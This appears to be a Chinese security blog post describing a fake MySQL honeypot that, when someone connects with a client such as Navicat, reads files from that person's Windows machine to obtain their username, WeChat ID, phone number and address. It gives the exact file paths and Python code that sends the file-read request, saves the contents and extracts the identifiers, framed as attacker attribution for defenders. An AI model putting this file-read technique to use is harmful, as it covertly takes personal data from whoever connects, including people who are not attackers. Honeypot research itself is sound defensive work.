<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    通過蜜罐技術獲取攻擊者手機號、微信號

    VSole2022-03-23 06:31:59

    ?

    ?相關聲明

    以下內容僅限用于紅藍攻防對抗等專業領域,請勿用于非法用途。

    雜談

    首先,我們先講一下蜜罐的概念,你可以簡單理解較為蜜罐就是一個陷阱,故意暴露一些我們人為設計好的漏洞,讓攻擊者自投羅網。

    蜜罐介紹

    蜜罐是對攻擊者的欺騙技術,用以監視、檢測、分析和溯源攻擊行為,其沒有業務上的用途,所有流入/流出蜜罐的流量都預示著掃描或者攻擊行為,因此可以比較好的聚焦于攻擊流量。

    蜜罐可以實現對攻擊者的主動誘捕,能夠詳細地記錄攻擊者攻擊過程中的許多痕跡,可以收集到大量有價值的數據,如病毒或蠕蟲的源碼、黑客的操作等,從而便于提供豐富的溯源數據。另外蜜罐也可以消耗攻擊者的時間,基于JSONP等方式來獲取攻擊者的畫像。

    但是蜜罐存在安全隱患,如果沒有做好隔離,可能成為新的攻擊源。

    Fake Mysql

    這里再提一下Fake Mysql的概念,通過偽裝Mysql服務器,誘導攻擊者來連接,利用漏洞來讀取攻擊者電腦的文件從而就有了下面的內容

    蜜罐技術獲取手機號、微信號、地址

    那么如何通過這種技術獲取攻擊者的手機號和微信呢?

    正常獲取的思路

    我們先來講一下讀取手機號和微信ID的正常方法,分為以下三個步驟

    • 通過C:/Windows/PFRO.log獲取windows用戶名
    • 通過C:/Users/用戶名/Documents/WeChat Files/All Users/config/config.data獲取wxid
    • 通過C:/Users/用戶名/Documents/WeChat Files/wx_id/config/AccInfo.dat獲取地址、微信號、手機號

    獲取windows用戶名

    我們這里在自己的電腦中進行測試,打開C:/Windows/PFRO.log,可以看到我的用戶名是66396


    獲取wxid

    然后,我們訪問C:/Users/66396/Documents/WeChat Files/All Users/config/config.data

    這里可以獲取到wxid

    獲取手機號、微信號、地址

    可以看到手機號


    還有地址、微信號都有

    上面是黑客入侵后,查看電腦中的文件可以獲取到的信息,那么如何設計一個蜜罐,讓黑客在攻擊時自投羅網,幫助我們防守方溯源到攻擊者的信息呢?

    核心代碼

    如何把上述過程進行自動化呢?我們可以看下核心代碼

    下面的代碼主要有兩個作用

    1.判斷是否為掃描器或者密碼爆破工具,進行交互握手,效果是掃描器直接爆3306弱口令。

    2.如果是直接連接,去讀取設定好的文件,并寫入本地保存。

    def mysql_get_file_content(filename,conn,address):    logpath = os.path.abspath('.') + "/log/" + address[0]if not os.path.exists(logpath):        os.makedirs(logpath)    conn.sendall("xxx")try:        conn.recv(1024000)except Exception as e:        print(e)
    try:        conn.sendall("xx")        res1 = conn.recv(1024000)# SHOW VARIABLESif 'SHOW VARIABLES' in res1:            conn.sendall("xxx")            res2 = conn.recv(9999)if 'SHOW WARNINGS' in res2:                conn.sendall("xxx")                res3 = conn.recv(9999)if 'SHOW COLLATION' in res3:                    conn.sendall("xxx")                    res4 = conn.recv(9999)if 'SET NAMES utf8' in res4:                        conn.sendall("xxx")                        res5 = conn.recv(9999)if 'SET character_set_results=NULL' in res5:                            conn.sendall("xxx")                            conn.close()else:                        conn.close()else:                    conn.close()else:                conn.close()else:try:                wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename                conn.sendall(wantfile)                content=''while True:                    data = conn.recv(1024)print len(data)                    content += dataif len(data) < 1024:print 'ok'break
                    conn.close()                item=logpath + "/" + filename.replace("/", "_").replace(":", "")+'_'+str(random.random())if len(content) > 6:with open(item, "w") as f:                        f.write(content)                        f.close()return (True,content)else:return (False,content)except Exception as e:print (e)except Exception as e:print (e)
    

    為了防止讀取文件內容不完整,可以加入while循環。

    while True:        conn, address = sv.accept()        first_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")global files1global usernameglobal wx_id        file=files1[0].replace('Administrator',username).replace('wx_id',wx_id)        res,content = mysql_get_file_content(file,conn,address)        files1.append(files1[0])        files1.remove(files1[0])if res:if 'PFRO' in file:                username = get_username(content)                s= "xx" % (xx)                cursor.execute(s)                data = cursor.fetchall()if len(data)==0:                    s = "XX" % (xx)                    cursor.execute(s)                    db.commit()print 'success:'+ file                    insert_file(file,address,username)elif 'config.data'in file:                content = content                wxid = re.findall(r'WeChatFiles\\(.*)\\config', content)[0]                sql = "xxx" % (xxx)                cursor.execute(sql)                db.commit()                wx_id=wxid                img = qrcode.make('weixin://contacts/profile/'+wxid)                img.save(os.path.abspath('.')+'/static/pic/'+wxid+'.png') print 'success:'+ file                insert_file(file,address,username)elif 'AccInfo' in file:                content = content                phone = re.findall(r'[0-9]{11}', content)[-1]                sql = "xxx" % (xxx)                cursor.execute(sql)                db.commit()print 'success:'+ file                insert_file(file,address,username)else:            files1=files            username='Administrator'
    

    工具下載:

    關注HACK之道公眾號回復:蜜罐,獲取工具下載地址

    當然,熱心網友們最關心的還是工具效果展示,我們可以進行測試

    我們需要先將工具下載下來傳入服務器

    然后修改webServer.py中admin的密碼,當然,你也可以更換用戶名,這個根據個人習慣來修改。

    然后通過docker啟用服務

    然后運行本項目

    docker-compose up -d
    


    docker-compose up -d
    

    使用方法

    攻擊者通常會發現我們網站的一些漏洞,我們這里使用蜜罐技術,故意暴露我們的數據庫,我們數據庫這里設置弱口令,讓攻擊者可以連接。

    攻擊者在使用navicat連接我們的數據庫時成功后,我們可以執行代碼,讀取到它的手機號、微信號、地址

    并可以在5000端口訪問后臺,輸入我們剛才設置的admin以及密碼fancypig

    然后就可以看到攻擊者信息了!

    內容來源:https://www.iculture.cc/knowledge/pig=10727

    信息安全蜜罐技術
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    從市場的前端產品標準來看,現在行業內只要做工控安全,必然要提到“白名單”技術理念。郭洋說到,信息安全標準是我國信息安全保障體系的重要組成部分。構建“1246”網絡安全防護體系 郭洋認為,三分技術、七分管理,是做好工控安全的箴言。目前工業企業工控安全面臨著網絡結構風險、防護能力風險、業務軟件風險、實施運維風險、工業協議風險、安全預警風險6大風險問題。
    當前國家形勢的驅使,國家信息安全的發展經濟水平的不斷提升,就需要不斷的提升綜合國力而網絡安全領域的對抗也是我國核心競爭力的一種優勢;本質上是人與人之間的對抗,而網絡終端、網絡設備、介質以及各種工具和平臺僅僅是作為輔助手段而存在。因此如何使網絡安全人員合理的利用手中的各種工具和策略來提高網絡安全對抗水平,是培養“高素質的網絡安全和信息化人才隊伍”亟需解決的問題。網絡攻防演練成為各企事業單位,乃至國家
    紅藍對抗—藍隊手冊
    2022-03-18 14:22:22
    紅藍對抗的主要目的在于,提高公司安全成熟度及其檢測和響應攻擊的能力。
    2021年12月22日,“2021年中國聯通總部信息安全威脅狩獵平臺新增迭代開發項目”發布項目公告,該項目以最高限價729.8萬元招標“威脅狩獵平臺應用軟件一套”,且招標文件里非常詳細地標明了采購需求與參數要求,在蜜罐類產品的市場需求上具有較為典型的參考價值,建議關注蜜罐類產品的甲乙方安全從業者參考。
    0x01 同源策略 瀏覽器沙盒、同源策略是瀏覽器中的兩個安全機制。圖5.jsonp劫持流程0x03 JSONP劫持漏洞的危害 JSONP劫持是一種敏感信息泄露的漏洞,經過攻擊者巧妙而持久地利用,會對企業和用戶造成巨大的危害。不同:1.JSONP劫持必須找到跨站請求資源的接口來實施攻擊,需要傳回回調函數。
    但隨著工業互聯網的發展,信息安全問題也逐漸成為影響數字工業可持續發展的重要因素。結合工業領域數字化發展與整體安全需求,天融信率先提出將功能安全與信息安全充分融合的“雙安融合”理念,將功能安全與信息安全進行有效融合,有效落實安全生產的最終目標,護航工業互聯網安全。全球活躍物聯網終端設備數量增長迅速,互聯網面臨的攻擊也在逐年提升,數據隱患加大。
    大數據、云計算等信息技術的發展,加速了信息化發展速度,同樣刺激了網絡攻擊的普遍化、持久化、武器化,也給攻擊溯源帶來了新挑戰。傳統的溯源技術大都針對某一類 或某幾類的數據進行分析,還原攻擊過程,且溯源過程需要大量的人工介入。從攻擊溯源的 基本思路入手,結合大數據技術特點,以及大數據安全產品的開發經驗,提出一種基于大數 據技術的多層溯源框架,對多元數據進行分析,繪制盡可能完整的攻擊路徑,還原攻擊全過程
    威努特作為中國工控安全領軍者,始終專注于守護我國關鍵信息基礎設施網絡空間安全,并持續關注和參與到“智改數轉”的建設,助力工業信息安全的發展。
    全球性安全威脅的格局每年都在演化。為了應對2018年的威脅,企業必須了解這五大全球性網絡威脅。 如果你認為2017年對于數據泄露來說是可怕的一年,那么2018年走著瞧。信息安全論壇(ISF)是一個專注于網絡安全和信息風險管理的全球性獨立信息安全機構,它預測數據泄露的數量和影響會增大,這在很大程度上要歸咎于組織將在2018年面臨的五大全球性安全威脅。
    云計算的出現徹底改變了 IT 產業和傳統企業的 IT 結構,但大部分企業的理念和技術方法還停留在傳統的 IT 時代,很多企業只是把云當成更大的服務器集群來使用,并沒有認識到云所帶來的底層技術上的本質性變革。這種理念的差異造成的最直接后果就是安全管理水平的滯后,云安全需要用新的安全管理思路和技術手段來應對。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类